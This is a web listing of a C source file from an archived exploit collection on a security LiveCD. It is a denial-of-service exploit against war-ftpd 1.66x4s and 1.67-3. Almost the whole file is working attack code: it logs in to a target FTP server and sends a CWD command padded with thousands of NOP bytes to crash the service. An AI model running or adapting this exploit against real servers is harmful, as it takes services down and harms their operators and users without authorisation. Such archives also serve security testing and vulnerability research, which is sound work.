home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / warftpd / warftpd-dos.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  2.7 KB  |  85 lines
  1. /*--------------------------------------------------------------*/
  2. /* war-ftpd 1.66x4s and 1.67-3 DoS sample by crc "warftpd-dos.c"*/
  3. /*--------------------------------------------------------------*/
  4.  
  5. #include    <stdio.h>
  6. #include    <string.h>
  7. #include    <winsock.h>
  8. #include    <windows.h>
  9.  
  10. #define     FTP_PORT        21
  11. #define     MAXBUF          8182
  12. //#define     MAXBUF          553
  13. #define     MAXPACKETBUF    32000
  14. #define     NOP             0x90
  15.  
  16. void main(int argc,char *argv[])
  17. {
  18.     SOCKET               sock;
  19.     unsigned long        victimaddr;
  20.     SOCKADDR_IN          victimsockaddr;
  21.     WORD                 wVersionRequested;
  22.     int                  nErrorStatus;
  23.     static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
  24.     hostent              *victimhostent;
  25.     WSADATA              wsa;
  26.  
  27.     if (argc < 3){
  28.         printf("Usage: %s TargetHost UserName Password\n",argv[0]); exit(1);
  29.     }
  30.  
  31.     wVersionRequested = MAKEWORD(1, 1);
  32.     nErrorStatus = WSAStartup(wVersionRequested, &wsa);
  33.     if (atexit((void (*)(void))(WSACleanup))) {
  34.         fprintf(stderr,"atexit(WSACleanup)failed\n"); exit(-1);
  35.     }
  36.  
  37.     if ( nErrorStatus != 0 ) {
  38.         fprintf(stderr,"Winsock Initialization failed\n"); exit(-1);
  39.     }
  40.  
  41.     if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
  42.         fprintf(stderr,"Can't create socket.\n"); exit(-1);
  43.     }
  44.  
  45.  
  46.     victimaddr = inet_addr((char*)argv[1]);
  47.     if (victimaddr == -1) {
  48.         victimhostent = gethostbyname(argv[1]);
  49.         if (victimhostent == NULL) {
  50.             fprintf(stderr,"Can't resolve specified host.\n"); exit(-1);
  51.         }
  52.         else
  53.             victimaddr = *((unsigned long *)((victimhostent->h_addr_list)[0]));
  54.     }
  55.  
  56.     victimsockaddr.sin_family        = AF_INET;
  57.     victimsockaddr.sin_addr.s_addr  = victimaddr;
  58.     victimsockaddr.sin_port  = htons((unsigned short)FTP_PORT);
  59.     memset(victimsockaddr.sin_zero,(int)0,sizeof(victimsockaddr.sin_zero));
  60.  
  61.     if(connect(sock,(struct sockaddr *)&victimsockaddr,sizeof(victimsockaddr)) == SOCKET_ERROR){
  62.         fprintf(stderr,"Connection refused.\n"); exit(-1);
  63.     }
  64.  
  65.     printf("Attacking war-ftpd ...\n");
  66.     recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
  67.     sprintf((char *)packetbuf,"USER %s\r\n",argv[2]);
  68.     send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
  69.     recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
  70.     sprintf((char *)packetbuf,"PASS %s\r\n",argv[3]);
  71.     send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
  72.     recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
  73.  
  74.     memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;
  75.  
  76.     sprintf((char *)packetbuf,"CWD %s\r\n",buf);
  77.     send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
  78.  
  79.     Sleep(100);
  80.     shutdown(sock, 2);
  81.     closesocket(sock);
  82.     WSACleanup();
  83.     printf("done.\n");
  84. }
  85.